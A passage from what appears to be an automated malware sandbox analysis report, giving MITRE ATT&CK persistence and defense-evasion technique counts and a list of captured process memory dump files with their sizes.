    - Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (3)
- Hidden Files and Directories (3)
- Account Manipulation (1)
- Registry Run Keys / Startup Folder (4)
- Winlogon Helper DLL (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (12)
- Disabling Security Tools (3)
- Hidden Files and Directories (3)
- Bypass User Account Control (1)
- File Deletion (2)
- Impair Defenses (1)
- File Permissions Modification (1)
Downloads
6.7MB
-
memory/4832-138-0x0000000000000000-mapping.dmp
-
memory/4852-129-0x0000000000000000-mapping.dmp
-
memory/4852-186-0x0000000000000000-mapping.dmp
-
memory/4864-151-0x0000000000000000-mapping.dmp
-
memory/4992-224-0x0000000000AC0000-0x0000000000C0A000-memory.dmpFilesize
1.3MB
-
memory/4992-218-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/4992-166-0x0000000000000000-mapping.dmp
-
memory/4992-219-0x0000000000400000-0x00000000009B6000-memory.dmpFilesize
5.7MB
-
memory/5056-130-0x0000000000000000-mapping.dmp
-
memory/5060-131-0x0000000000000000-mapping.dmp
-
memory/5080-183-0x0000000000000000-mapping.dmp
-
memory/5088-161-0x0000000000000000-mapping.dmp
-
memory/5096-184-0x0000000000000000-mapping.dmp
-
memory/5200-595-0x000001403B080000-0x000001403B097000-memory.dmpFilesize
92KB
-
memory/5304-601-0x0000015D03050000-0x0000015D03056000-memory.dmpFilesize
24KB
-
memory/5304-608-0x0000015D1B8C4000-0x0000015D1B8C5000-memory.dmpFilesize
4KB
-
memory/5304-583-0x0000015D009D0000-0x0000015D0146C000-memory.dmpFilesize
10.6MB
-
memory/5304-582-0x0000015D009D0000-0x0000015D0146C000-memory.dmpFilesize
10.6MB
-
memory/5304-598-0x0000015D03020000-0x0000015D03037000-memory.dmpFilesize
92KB
-
memory/5304-604-0x0000015D1B8C0000-0x0000015D1B8C2000-memory.dmpFilesize
8KB
-
memory/5304-605-0x0000015D1B8C2000-0x0000015D1B8C4000-memory.dmpFilesize
8KB
-
memory/5304-600-0x0000015D1B8D0000-0x0000015D1C8E6000-memory.dmpFilesize
16.1MB
-
memory/5344-606-0x000001BC42EA0000-0x000001BC42EB7000-memory.dmpFilesize
92KB
-
memory/5344-609-0x000001BC42ED0000-0x000001BC42ED1000-memory.dmpFilesize
4KB
-
memory/5344-610-0x000001BC42ED0000-0x000001BC42F10000-memory.dmpFilesize
256KB
-
memory/5448-596-0x000001AC0D1A0000-0x000001AC0D1B7000-memory.dmpFilesize
92KB
-
memory/5452-603-0x0000025B92060000-0x0000025B92077000-memory.dmpFilesize
92KB
-
memory/5492-581-0x0000000004BC0000-0x0000000004BC1000-memory.dmpFilesize
4KB
-
memory/5872-599-0x000001DAE1CB0000-0x000001DAE1CC7000-memory.dmpFilesize
92KB
-
memory/6760-602-0x000001CA1BF90000-0x000001CA1BFA7000-memory.dmpFilesize
92KB
-
memory/7056-611-0x0000000005530000-0x0000000005547000-memory.dmpFilesize
92KB
-
memory/7056-587-0x0000000000400000-0x0000000000417000-memory.dmpFilesize
92KB
-
memory/7064-612-0x000001C151F70000-0x000001C151F87000-memory.dmpFilesize
92KB